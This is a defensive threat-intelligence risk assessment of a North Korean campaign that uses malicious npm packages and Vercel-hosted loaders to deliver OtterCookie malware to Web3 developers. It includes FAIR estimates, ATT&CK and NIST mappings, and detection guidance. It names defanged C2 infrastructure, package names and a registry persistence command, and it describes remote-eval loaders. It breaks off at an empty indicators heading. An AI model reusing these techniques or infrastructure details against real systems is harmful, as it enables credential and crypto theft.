December 3, 2025

Synopsis

The analysis shows that a North Korean state-sponsored actor is running a sustained supply-chain campaign that compromises blockchain and Web3 developers by distributing malicious npm packages and GitHub/Vercel-hosted loaders that deploy the OtterCookie malware, enabling credential theft, seed-phrase exposure, remote access, and downstream compromise of production environments. Strategically, this intelligence requires organizations to reassess dependency-handling policies, supply-chain governance, and exposure conditions for developer teams; operationally, it drives tighter monitoring of npm installs, GitHub interactions, and outbound connections to staging or C2 infrastructure; and tactically, it informs detection engineering, endpoint hardening, and rapid response procedures for developer workstations. The threat elevates the overall risk posture by increasing both the likelihood and the potential magnitude of compromise, particularly when developer keys or wallet data can be used to pivot into production systems. Financial resilience is affected because compromise can directly translate into loss of digital assets, costly credential rotation, customer-impacting outages, regulatory exposure, and high incident-response costs, making proactive supply-chain controls and developer-focused defenses essential to stabilizing expected financial loss.

Evaluated Source, Context, and Claim

Artifact Title

Inside the GitHub Infrastructure Powering North Korea’s Contagious Interview npm Attacks

https://socket.dev/blog/north-korea-contagious-interview-npm-attacks

Source Type

Cybersecurity vendor threat research blog post

Publication Date: November 26, 2025

Credibility Assessment

Socket Threat Research is a specialized software supply chain security vendor that provides detailed technical analyses, including code snippets, IoCs, and infrastructure mapping, which supports moderate-to-high credibility. As a single-vendor source, its findings should ideally be correlated with independent reporting and additional telemetry where possible.

General Claim

The OSINT reports that North Korean state-sponsored operators are running the “Contagious Interview” campaign, using malicious npm packages, GitHub, and Vercel infrastructure, and the OtterCookie malware family to compromise blockchain and Web3 developers, exfiltrate credentials and wallet data, and remotely control infected systems for digital asset theft and espionage.

Narrative Reconstruction

The information describes a North Korean state-sponsored threat actor operating the Contagious Interview campaign, which targets blockchain and Web3 developers by posing as legitimate recruiters and assigning “test projects” that require victims to clone GitHub repositories and install npm dependencies laced with malicious packages such as tailwind-magic and node-tailwind. These packages act as loaders, contacting a Vercel-hosted staging server (tetrismic[.]vercel[.]app) that serves a main.js payload from a threat-controlled GitHub repository and ultimately executes an OtterCookie malware variant that establishes long-lived command-and-control to a dedicated server, performs VM and sandbox checks, and then launches parallel modules for clipboard theft, keylogging, multi-monitor screenshots, browser credential harvesting, wallet-extension data exfiltration, and recursive filesystem scanning. The primary assets at risk are developer endpoints, their browsers’ credential stores, crypto wallet extensions, seed phrases, keys, and sensitive source or configuration files on local disks and mounted volumes, which collectively provide access to digital assets, development environments, and potentially production infrastructure. Operationally, the campaign aims to turn npm installs and template use into a renewable initial-access vector that delivers persistent remote access to high-value developer systems, enabling both cryptocurrency theft and broader compromise of organizations that rely on those developers’ credentials, signing keys, and secrets.

Risk Scenario

Risk Scenario

A North Korean state-sponsored supply chain actor compromises blockchain and Web3 developers’ endpoints by delivering OtterCookie malware through malicious npm packages and GitHub/Vercel-hosted loaders, resulting in theft of crypto assets and sensitive credentials and enabling further compromise of organizational systems and data.

Threat

A state-sponsored North Korean threat group running the Contagious Interview campaign uses fake job interviews and developer “test assignments” to induce targets to pull threat-controlled GitHub projects and install npm dependencies that include malicious packages (for example, tailwind-magic, tailwind-node, node-tailwind) wired into common utility functions. The actor maintains and rotates supporting infrastructure on GitHub, Vercel, and dedicated C2 servers, and deploys OtterCookie as a multi-function infostealer and remote access trojan tuned for developer environments and crypto-focused workflows.

Method

The threat exploits trust in open-source ecosystems and recruitment workflows: victims install typosquatted or deceptive npm packages whose postinstall or import-time loaders fetch and eval a JavaScript payload from tetrismic[.]vercel[.]app, which in turn runs OtterCookie and registers the host with C2 at 144[.]172[.]104[.]117:5918. Once active, the malware performs host fingerprinting and anti-VM checks, then spawns separate modules for clipboard monitoring and remote shell, browser credential and wallet-extension theft (Chrome/Brave, multiple crypto wallets), keylogging, multi-monitor screenshot capture, and recursive scanning and exfiltration of files whose names suggest secrets, wallets, or sensitive documents, while establishing persistence (for example, Run keys and scheduled tasks on Windows).

Asset

Primary assets include developer workstations and laptops used for JavaScript, Web3, and DeFi development; their local development environments and CI-adjacent tooling; browser credential stores for Chrome and Brave; cryptocurrency wallet extensions, seed phrases, private keys, and configuration files; and any secrets, keys, or sensitive documents stored on local disks or mounted file systems that could be used to access production wallets, signing infrastructure, or cloud administration interfaces.

Impact

If the scenario materializes, the organization can suffer direct financial loss from theft or misuse of cryptocurrency and other digital assets controlled from compromised developer endpoints; secondary compromise of production services or customer environments via stolen credentials and keys; exposure of proprietary source code and sensitive documents; regulatory or contractual consequences where customer data or financial systems are affected; and additional incident response, remediation, and monitoring costs, along with reputational damage among customers, partners, and the broader Web3 ecosystem.

Evidentiary Basis for Synopsis and Recommendations

Supporting observations from the analysis help clarify how the threat landscape, control environment, and organizational behaviors interact to shape overall risk exposure. These insights provide the foundation for identifying where controls perform well, where gaps or weaknesses create unnecessary vulnerability, and how attacker methods intersect with real-world operational conditions. Building on these findings, the recommendations that follow focus on strengthening resilience, improving decision-making, and guiding readers toward practical steps that enhance both security posture and risk-informed governance.

FAIR Breakdown

Threat Event Frequency (TEF)

Because the OSINT describes a large, ongoing npm supply-chain campaign with 197 new malicious packages and over 31,000 additional downloads in a recent wave, TEF for a single organization must be inferred from ecosystem-scale activity. For a mid-size blockchain/Web3 development organization that frequently pulls npm packages and uses GitHub/Vercel-based templates, TEF is best characterized as moderate-to-high, reflecting regular exposure to malicious packages and lures rather than rare, one-off contact.

Contact Frequency (CF)

The campaign pushes dozens of loader packages into the npm ecosystem and keeps at least some of them live at any given time. At the same time, new infiltrations appear weekly, suggesting a steady background level of malicious packages available to developers resolving dependencies. Combined with cloned crypto/DEX front ends and GitHub lure repositories, this creates a moderate CF at the single-organization level (multiple opportunities per year for a team that regularly installs new packages), even though the global ecosystem sees much higher contact rates. Sector targeting is relatively focused: blockchain/Web3, DeFi, token projects, and crypto-adjacent JavaScript developers are explicitly in scope, while more generic enterprise developers are exposed primarily through transitive dependencies and reused templates rather than direct recruiter lures.

Probably of Action (PoA)

The information explicitly attributes this to North Korean state-sponsored operators with a clear financial and strategic interest in draining digital assets and harvesting developer credentials, which strongly supports a high PoA once a viable contact point is found. The factory-style operation, the continuous introduction of new packages, the maintenance of dedicated C2 infrastructure, and the reuse of successful techniques across multiple repositories all indicate that the actors are both motivated and committed to acting aggressively whenever a developer installs one of their packages or engages with their lures.

Threat Capability (TCap)

TCap is high-to-very-high, as the campaign combines sophisticated supply-chain access, cross-platform malware, and operational discipline.

Exploit sophistication: Rather than relying on classic CVE exploitation, the actors exploit the npm/GitHub/Vercel trust chain, typosquatting legitimate utilities (tailwind-merge) and embedding postinstall or import-time loaders that achieve arbitrary code execution during normal dependency resolution; this reflects high sophistication in abusing modern JavaScript workflows.

Bypass ability: The loaders execute within legitimate Node.js processes, and OtterCookie includes VM/sandbox checks, multi-process detaching, and host fingerprinting, which helps it evade basic sandboxes and some endpoint monitoring, showing strong defensive bypass capability.

Tooling maturity: OtterCookie is a mature, multi-stage RAT/infostealer with remote shell, clipboard theft, keylogging, cross-platform browser credential theft, wallet-extension targeting, screenshotting, and large-scale filesystem exfiltration, all orchestrated via structured C2 APIs—clearly not a one-off or amateur toolset.

Campaign success rate: While the information does not give explicit compromise counts, the 31,000+ downloads in a short window and repeated reinfection of npm with new packages suggest that at least some measurable fraction of downloads result in execution; within the targeted Web3/crypto developer population, this implies a moderate-to-high success rate when controls are weak.

Attack path sophistication: The full path—fake job/test assignment or lure template, GitHub-hosted project with malicious dependencies, npm loader that calls Vercel stager, dynamic retrieval and eval of payload, and then a staged OtterCookie RAT with parallel workers and persistence—demonstrates a sophisticated, multi-hop attack chain designed for resilience and flexibility.

Cost to run attack: Once the malware family, staging stack, and automation are built, the marginal cost of publishing new npm packages, cloning repos, and rotating payloads is relatively low for a state-backed group, making the campaign economically feasible to sustain over long periods.

Control Strength (CS)

Many dev teams do not systematically treat npm installs as remote code execution, so:

• Pre-install screening is inconsistent or absent.

• Lockfile enforcement and strict dependency policies are often weak.

• Behavioral package analysis (e.g., detecting eval on network responses) is rarely enforced.

• Where dependency scanning and code review exist, they may:

  • Catch obvious red flags (unknown utilities, unstable ownership, suspicious metadata).

  • Miss sophisticated loaders that mimic legitimate utilities and hide import-time behavior.

• Network and environment controls are uneven:

  • Some organizations lack tight egress controls from developer endpoints and CI runners.

  • Build agents may reach arbitrary internet hosts, enabling staging/C2 communication.

• Overall RS for a typical mid-size Web3 dev org is:

  • Moderate at best if they have explicit supply-chain controls.

  • Low-to-moderate, where such controls are immature or ad hoc.

Control Failure Rate

Human and process failures are common:

• Developers accept recruiter-provided repos or templates with limited scrutiny.

• New “utility” packages are added to global helpers without deep review.

• Time pressure encourages trusting popular-looking npm packages and GitHub stars.

• Technical and governance gaps increase failure likelihood:

  • No enforced policy for third-party package vetting or owner reputation checks.

  • Limited or no behavioral analysis for post-install/import-time behaviors.

  • Weak separation between build environments, developer endpoints, and production secrets.

• Monitoring and detection gaps further raise the failure rate:

  • Minimal telemetry focused on developer endpoints and CI runners.

  • Little alerting on suspicious outbound connections or anomalous npm behavior.

• Net result:

  • Control failure rate against this specific npm/GitHub/Vercel supply-chain path is best characterized as moderate-to-high for a typical Web3 development shop.k.

Susceptibility

Given high threat capability and only moderate control strength in many Web3 development environments, overall susceptibility for a typical mid-size blockchain/Web3 organization that actively uses npm and GitHub is reasonably estimated at around 50 percent (with a plausible range of roughly 40–60 percent) per meaningful contact.

The probability that the asset will be harmed is influenced by:

Exploitability: Once a malicious package is installed and executed, technical exploit barriers are low—the loader has Node.js-level execution and OtterCookie handles privilege and persistence—so exploitability per contact is high; the main barrier is whether controls prevent or detect the package before or shortly after use.

Attack surface: Organizations that frequently introduce new dependencies, experiment with templates, and engage in Web3/DeFi projects have a large attack surface, as each new project, template, or npm install is a potential contact point; this supports a moderate-to-high exposure fraction among developers.

Exposure conditions: During periods of active hiring, test assignments, and rapid prototyping of new DEX/token projects, developers are more likely to accept recruiter-provided repos and “example” templates, increasing the likelihood that a malicious package executes before it is noticed.

Patch status: Traditional OS or library patching has limited protective effect here because the attack path hinges on supply-chain trust rather than on exploiting known CVEs; patching still matters for defense-in-depth, but it does little to reduce the core exploitability of a malicious npm loader.

Numerical Frequencies and Magnitudes

All values relating to actual dollar amounts are for example/speculative purposes only. Organizations would need to take into account their own asset values, control strength, telemetry, etc., and adjust numbers accordingly.

Loss Event Frequency (LEF)

2/year (estimated)

• Justification: For a mid-size blockchain/Web3 development organization that frequently installs npm packages and occasionally consumes new templates or recruiter-supplied projects, assume an underlying Threat Event Frequency (contacts) of about 4 meaningful opportunities per year where a malicious package from this campaign could be introduced. With an estimated vulnerability (probability of harm per contact) of 0.5, this yields an approximate Loss Event Frequency of 2 successful compromise events per year.

Vulnerability (probability of harm per contact): .5

• Justification: Given high threat capability, moderate control strength, and the reliance on developer behavior and supply-chain controls that are often imperfectly implemented, it is reasonable to assume that roughly half of meaningful contacts (e.g., installs of malicious packages that reach developers or CI) could progress to a realized loss event in the absence of strong, specifically tuned safeguards.

Secondary Loss Event Frequency

1/year (estimated)

• Justification: Not every primary compromise will lead to secondary losses such as large-scale wallet theft, downstream cloud compromise, or customer-impacting events; however, because OtterCookie aggressively harvests credentials, wallet data, and secrets, it is plausible that about half of primary incidents result in some secondary consequence, giving an estimated SLEF of roughly one secondary loss event per year for the assumed organization.

Loss Magnitude

Estimated range:

• Min: $50,000

• Most Likely: $400,000

• Maximum: $3,000,000

Justification:

• The minimum bound represents cases where the compromise is contained largely to a single developer endpoint with limited direct crypto exposure, covering incident response, forensics, re-imaging, and engineering time to rotate credentials and review code. The most likely value assumes some theft or misuse of wallets and secrets accessible from the compromised environment, plus broader remediation and lost productivity. The maximum case allows for a high-value developer whose keys and wallets control significant on-chain assets or production integrations, where compromise could enable substantial direct financial theft and more extensive recovery.

Secondary Loss Magnitude (SLM)

Estimated range:

• Min: $250,000

• Most Likely: $2,000,000

• Maximum: $15,000,000

Justification:

• Secondary losses arise when stolen credentials, wallets, or secrets are used to access production wallets, DeFi protocols, or cloud environments, resulting in customer-impacting incidents, regulatory exposure, contractual penalties, reputational harm, and technical recovery costs. The minimum bound assumes limited customer impact and relatively contained on-chain loss; the most likely value reflects a moderate on-chain theft plus legal, PR, and extended IR costs; and the maximum allows for a high-impact event involving substantial digital-asset theft, service disruption, and regulatory scrutiny in a heavily crypto-exposed business.

Mapping, Controls, and Modeling

MITRE ATT&CK Mapping

Resource Development

T1584 – Compromise Infrastructure

Reference: “A Vercel-hosted staging endpoint, tetrismic[.]vercel[.]app… a threat actor-controlled GitHub account, stardev0914…”

T1587.001 – Malware Development

Reference: “The payload itself is a recent OtterCookie malware variant…”

T1583.006 – Web Services

Reference: “Vercel serves the latest payload… GitHub hosts the development repository.”

T1583.004 – Server Infrastructure

Reference: “A separate C2 server handles data collection and tasking.”

T1608.001 – Upload Malicious Tools

Reference: “197 malicious npm packages… at least five malicious npm packages… rely on this infrastructure to deliver a second-stage payload.”

Initial Access

T1195 – Supply Chain Compromise

Reference: “The campaign… infiltrates the npm ecosystem… at least 197 malicious npm packages…”

T1204.002 – User Execution: Malicious File

Reference: “A victim installs a malicious npm package that fetches a payload…”

T1199 – Trusted Relationship

Reference: “Targets… through fake job interviews and ‘test assignments’… recruiter personas pointing victims to GitHub repositories.”

Execution

T1059.007 – JavaScript Execution

Reference: “The package… executes src/lib/index.js… eval the returned JavaScript.”

T1059.003 – Command Execution via Shell

Reference: “Exec returned command… remote shell… execute arbitrary command from C2.”

T1059 – Command and Scripting Interpreter

Reference: “Node.js process privileges… executed with eval() inside the victim’s Node.js process.”

T1204.003 – Execution via Malicious Module Load

Reference: “The exported API behaves like a normal utility, but… import-time loader executes threat actor code.”

Persistence

T1547.001 – Registry Run Keys / Startup Folder

Reference: “Adds a Run entry HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ‘NodeHelper’.”

T1053.005 – Scheduled Task

Reference: “Creates a scheduled task NodeUpdate to run node <dir>\index.js at logon.”

Defensive Evasion

T1497 – Virtualization/Sandbox Evasion

Reference: “Performs VM and sandbox detection… flags systems whose output contains vmware, virtualbox…”

T1027 – Obfuscated/Hidden Code

Reference: “Hex-escaped payload strings… eval of remote JavaScript…”

T1036 – Masquerading

Reference: “Typosquatted clone of the legitimate tailwind-merge library… appears to be harmless utilities.”

Credential Access

T1555.003 – Credentials from Web Browsers

Reference: “Collection of browser credentials and wallet extension data from Chrome and Brave.”

T1552 – Unsecured Credentials

Reference: “Harvest… seed phrases, wallet data, sensitive documents.”

Discovery

T1082 – System Information Discovery

Reference: “Fingerprints the host… OS, platform, hostname, userinfo…”

T1497.001 – System Checks for Analysis Artifacts

Reference: “VM and sandbox detection… system_profiler… /proc/cpuinfo.”

T1083 – File and Directory Discovery

Reference: “Recursive file-system search for secrets, wallets, and sensitive documents.”

Collection

T1113 – Screen Capture

Reference: “Multi-monitor screenshot capture.”

T1056.001 – Keylogging

Reference: “System-wide keylogging.”

T1115 – Clipboard Data

Reference: “Continuous clipboard theft.”

T1005 – Data from Local System

Reference: “Recursive search… harvesting credentials, seed phrases, wallet data, sensitive documents.”

Command and Control

T1071.001 – Web Protocols

Reference: “C2 traffic goes to http://144[.]172[.]104[.]117:5918…”

T1102 – Web Services C2

Reference: “Loader fetches payload from tetrismic[.]vercel[.]app… communicates back to C2 server.”

T1219 – Remote Access Tools

Reference: “Provides an interactive remote shell… long-lived C2 channel.”

Exfiltration

T1041 – Exfiltration Over C2 Channel

Reference: “Clipboard data exfiltration… POST to /clip… upload of files to /total.”

T1567.002 – Exfiltration to Cloud Services

Reference: “Exfiltration via Vercel-hosted infrastructure and C2 endpoints.”

NIST 800-53 Affected Controls

SC-18(1) — Mobile Code | Prohibit Unauthorized Mobile Code

The malicious npm packages execute JavaScript supplied remotely by a threat actor, violating the intent of SC-18(1) to restrict unapproved or unvetted mobile code.

Reference: “Postinstall script… eval the returned JavaScript… granting the threat actor arbitrary code execution with full Node.js process privileges.”

This bypasses organizational controls intended to prevent execution of untrusted or dynamically fetched code.

SA-12(3) — Supply Chain Protection | Software Integrity Verification

The campaign relies on typosquatting and deceptive npm packages that impersonate legitimate utilities, directly targeting controls that require verification of supplier integrity.

Reference: “tailwind-magic is a typosquatted and backdoored clone of the legitimate tailwind-merge library.”

This activity intentionally defeats integrity validation requirements for third-party software dependencies.

SA-11(1) — Developer Testing and Evaluation | Static and Dynamic Code Analysis

Malicious loaders hide harmful behavior inside what appears to be benign class-merging utilities, bypassing static and dynamic analysis that organizations should perform.

Reference: “The exported API behaves like a normal Tailwind class-merging helper… import-time loader executes threat actor-controlled code.”

This demonstrates evasion of expected software evaluation controls during dependency onboarding.

CM-7(2) — Least Functionality | Restrict Software Functionality

Node.js processes run attacker-provided JavaScript and spawn subprocesses with broad system access, violating restrictions on the functionality of executed code.

Reference: “Executes remote payload with eval()… spawns separate, detached Node.js processes performing keylogging and filesystem scanning.”

This indicates a breakdown in enforcing the least functionality in developer environments.

SI-4(14) — System Monitoring | Detect Unauthorized Commands

The RAT provides a remote shell allowing arbitrary command execution while avoiding detection, directly challenging monitoring controls.

Reference: “Polls /command… execute arbitrary command from C2… POST output back to server.”

This explicitly bypasses detection mechanisms meant to identify unauthorized command execution.

SI-3 — Malicious Code Protection

OtterCookie performs classic malicious-code behaviors—keylogging, credential theft, file exfiltration—undetected in the development environment.

Reference: “Multi-stage infostealer and remote access trojan… clipboard theft… keylogging… recursive filesystem scanning.”

Failure to detect or prevent this malware reflects a breakdown in SI-3 protections.

SC-7(5) — Boundary Protection | Prevent Unauthorized Exfiltration

The malware exfiltrates browser credentials, screenshots, and secrets over HTTP to the C2 server, bypassing outbound filtering.

Reference: “All C2 traffic goes to 144[.]172[.]104[.]117… uploads files to /total.”

This indicates insufficient boundary controls preventing outbound exfiltration.

AC-6(10) — Least Privilege | Prevent Privilege Abuse

The malware uses the privileges of to authorized user to establish persistence, run background processes, and access browser credential stores.

Reference: “Creates scheduled task NodeUpdate… adds Run entry… accesses Chrome and Brave login databases.”

This shows ineffective enforcement of least privilege in developer endpoints.

PL-8 — Security and Privacy Architectures

The overall architecture of the attack bypasses organizational software supply-chain protections, violating architectural requirements for secure system design.

Reference: “npm, GitHub, and Vercel as a combined, renewable initial access channel.”

This shows failure to architect systems to prevent a chained supply-chain compromise.

RA-5 — Vulnerability Monitoring and Scanning

Malicious dependencies present in production repositories indicate insufficient vulnerability scanning of npm modules.

Reference: “15 malicious npm packages remain live at the time of writing… reported to npm security team.”

Failure to identify malicious packages before import represents a breakdown in RA-5 processes.

Threat Model

Monitoring, Hunting, Response, and Reversing

Monitoring

Monitoring for the Contagious Interview / OtterCookie campaign requires telemetry from developer endpoints (Node.js process creation, JavaScript execution patterns, clipboard access, screenshot APIs, filesystem traversal spikes), network egress logs for connections to Vercel-hosted staging domains and the C2 server (144[.]172[.]104[.]117:5918), DNS logs for typosquatted npm package lookups, GitHub API activity from developer machines, and identity logs indicating access to suspicious recruiter-shared repositories. Logging sufficiency requires elevated levels of Node.js runtime events, filesystem access, persistence points (registry run keys, scheduled tasks), browser credential database reads, and outbound HTTP POST activity not associated with typical development workflows. Key indicators include npm package installs with postinstall or import-time eval behavior, eval() of remote JavaScript, unexpected calls to tetrismic[.]vercel[.]app, spawning of detached Node.js subprocesses, rapid recursive file enumeration, and consistent clipboard polling. Monitoring gaps include weak telemetry for developer endpoints, a lack of egress filtering, limited inspection of npm install behaviors, and insufficient visibility into GitHub template pulls. Correlation logic should combine npm install events, connections to threat infrastructure, new persistence entries, and browser credential database access to generate high-confidence alerts, with thresholds tuned to flag any eval-on-network-response behavior as critical. Dashboards should track npm supply-chain installs, anomalous external connections, persistence creation, and browser data access patterns; metrics should visualize deviation from baseline endpoint activity. Validation should rely on replaying safe, simulated malicious package installs to ensure that alerting, correlation, and dashboards accurately reflect the described behaviors.

Hunting

Hunting should begin with hypotheses that malicious npm packages have been installed on developer systems or CI runners and that Node.js processes are performing unauthorized remote loading, clipboard theft, credential harvesting, or filesystem scanning. Required telemetry sources include endpoint process logs, Node.js execution traces, npm audit/install logs, GitHub clone history, DNS to tetrismic[.]vercel[.]app, and outbound HTTP traffic to 144[.]172[.]104[.]117. Detection logic should focus on identifying eval() on remote responses, Node.js processes spawning detached subprocesses, repeated clipboard reads, access to Chrome/Brave credential databases, cross-platform screenshot API calls, and rapid read-heavy traversal of mounted storage paths. Noise-to-signal considerations are significant in developer environments where legitimate Node.js activity is high, requiring filtering by rare behaviors such as VM-check routines, scheduled task creation by node.exe, or HTTP POST of clipboard/screenshot content.

Response

Response requires collecting endpoint logs showing Node.js execution chains, npm install histories, registry Run key modifications, scheduled task creation, browser credential DB access, outbound C2 communication, and filesystem traversal artifacts. Expected artifacts include loader scripts, the staged main.js payload retrieved from tetrismic[.]vercel[.]app, OtterCookie modules (clipboard, credential, screenshot, keylogging components), persistence entries, and exfiltration logs. Anti-forensic behavior is limited mainly to VM/sandbox avoidance, but the malware’s multi-process detachment complicates containment. Reconstruction relies on correlating npm install timestamps with outbound requests to staging domains and on the creation of persistence mechanisms, then mapping clipboard, credential, and file exfiltration events to specific DFIR impact estimates for FAIR modeling. Likely containment involves quarantining infected developer endpoints, blocking associated domains/IPs, rotating all potentially exposed credentials and signing keys, and validating that production secrets were not accessible. Priority artifacts include the malicious npm packages, network captures of eval-based payload retrieval, credential theft logs, and screenshots exfiltrated to the C2 server. Telemetry requirements center on high-fidelity endpoint and network data; IR gaps typically include a lack of historic npm telemetry and weak visibility into developer workflows. DFIR validation requires executing safe replicas of malicious loaders in isolated sandboxes to confirm behavior matches observed indicators.

Reverse Engineering

Reverse engineering should focus on the loader behavior embedded in malicious npm packages that execute import-time code, fetch remote JavaScript from tetrismic[.]vercel[.]app, and run it inside the Node.js process via eval. Evasion mechanisms include multi-platform VM and sandbox checks, anti-analysis fingerprinting, and the separation of infrastructure across GitHub, Vercel, and a dedicated C2 server. Persistence artifacts include registry Run keys and scheduled tasks on Windows. Indicators include hardcoded references to the staging domain, eval-based execution, specific wallet extension IDs, repeated clipboard and filesystem API calls, and outbound HTTP POST patterns. Dynamic hooks should instrument Node.js child_process, fs, and clipboard APIs, as well as axios/fetch calls to capture the payload execution flow; static analysis should review obfuscated or hex-encoded modules and the staged main.js. Expected artifacts include screenshots, keylogging buffers, harvested browser credential exports, and copied wallet extension directories. Additional reverse engineering efforts should compare OtterCookie’s modules to earlier BeaverTail/OtterCookie variants to identify version changes, capability evolution, and infrastructure reuse.

CTI

CTI analysis should evaluate PIRs around whether the actor targets the organization’s sector (blockchain/Web3), whether any developers fit the recruitment-lure profile, the recurrence of npm infiltration waves (weekly additions of new malicious packages), and consistent TTPs such as typosquatted npm loaders, Vercel-hosted remote payloads, eval-based execution, browser credential theft, and recursive file harvesting. Assets most consistently targeted include developer endpoints, browser stores, wallet extensions, and repositories used for test assignments. SIR evaluation highlights missing IOCs such as hashes for specific malicious npm versions, complete lists of C2 endpoints, and detailed relationships among cloned GitHub repositories; additional malware samples and payload versions are needed to confirm capability drift. Attribution gaps center on infrastructure clustering and reuse patterns, necessitating more comprehensive mapping of GitHub, Vercel, and C2 nodes. Telemetry requirements include npm install logs, GitHub clone events, Node.js process activity, and outbound HTTP patterns toward suspicious domains. Collection priorities include continuous monitoring of OSINT sources, supply-chain security vendors, malware sandboxes analyzing Node.js threats, ISAC notifications, and tracking new npm package uploads by suspicious accounts. Mapping efforts should cluster infrastructure across stardev0914-type accounts, identify recurring loader patterns, map TTPs to ATT&CK to support trend identification, compare new packages to historical OtterCookie deployments, and assess confidence levels as new data emerge. Overall, CTI should focus on detecting emerging patterns in loader design, frequency of npm infiltrations, payload evolution, and infrastructure rotation to refine hypotheses and improve forecasting.

GRC and Testing

Governance

Governance updates should prioritize strengthening policy requirements for software supply-chain security, explicitly mandating pre-install verification of npm dependencies, behavioral package analysis, and restrictions on executing dynamically fetched JavaScript elements, which are often missing or insufficient in existing policies. Oversight functions should include formal review of developer workflows, CI/CD dependency integration, and cloud-to-endpoint trust boundaries to ensure recruiters’ “test assignments” or cloned GitHub repositories cannot bypass established governance. RA, PM, and PL family documents require updates to reflect the organization’s exposure to third-party code execution, mandating architectural controls for supply-chain intake, multi-environment separation, and defined telemetry baselines for developer workstations. The risk register should add a dedicated supply-chain compromise entry, detailing impacts such as credential theft, seed phrase exposure, and downstream production compromise, along with FAIR-derived frequency and magnitude estimates. Executives and the board should receive recurring briefings summarizing attacker TTP evolution, the cadence of npm infiltration, exposure conditions for internal developer teams, and the potential business impact—framed in clear financial terms and tied directly to governance decisions on investment in secure development lifecycle controls and monitoring capabilities.

Audit and Offensive Security Testing

Audit and offensive security activities should validate whether current controls meaningfully prevent or detect malicious npm packages, assess evidence gaps in dependency onboarding, and verify whether policies governing developer environments, CI runners, and repository intake are consistently enforced. Findings should focus on weaknesses such as missing logging for Node.js execution, inadequate egress filtering, insufficient code-review rigor, and lack of supply-chain integrity checks. Compliance requirements tied to software integrity, boundary protection, and malicious code detection must be evaluated against actual behaviors exhibited by OtterCookie, including remote eval, credential theft, and filesystem scraping. Red team exercises should simulate developer-workflow compromise by introducing test malicious packages or lure repositories to measure detection and response effectiveness, while purple teams refine analytics for eval-based payload delivery or multi-process detachment. The penetration testing scope should explicitly include dependency trees, GitHub template ingestion, and ephemeral CI/CD environments to reproduce how an attacker’s loader executes and propagates. Control validation should verify that updated governance requirements—such as dependency pinning, package reputation checks, and egress restrictions—operate effectively against realistic exploit reproductions mirroring this campaign’s methods.

Awareness Training

Awareness training must highlight the social engineering pattern central to this operation: recruiter personas assigning “test projects” that direct developers to clone malicious GitHub repositories or install deceptive npm packages. Human failure modes—such as trusting unsolicited recruiters, importing dependencies without inspection, and executing commands from unfamiliar code—should be explicitly addressed with scenario-driven examples. Role-specific adjustments are needed: developers must receive in-depth training on supply-chain risks and dependency vetting; administrators should understand the impacts of credential harvesting and the importance of endpoint hardening; finance and executives should recognize that seed-phrase theft and wallet compromise can result in direct financial losses. Employees should be taught to acknowledge behavioral indicators such as typosquatting package names, unexpected post-install behavior, or recruiter-provided repositories that require npm installs. Phishing simulations should include developer-centric lures (GitHub project invites, coding assignments, npm instructions). Communication guidelines should reinforce cautious handling of unsolicited job-related outreach and strict verification of external repositories. Reinforcement cycles should measure reductions in susceptibility by tracking changes in developer behavior, dependency-review compliance, and improved reporting of suspicious packages or recruiter interactions.

Indicators of Compromise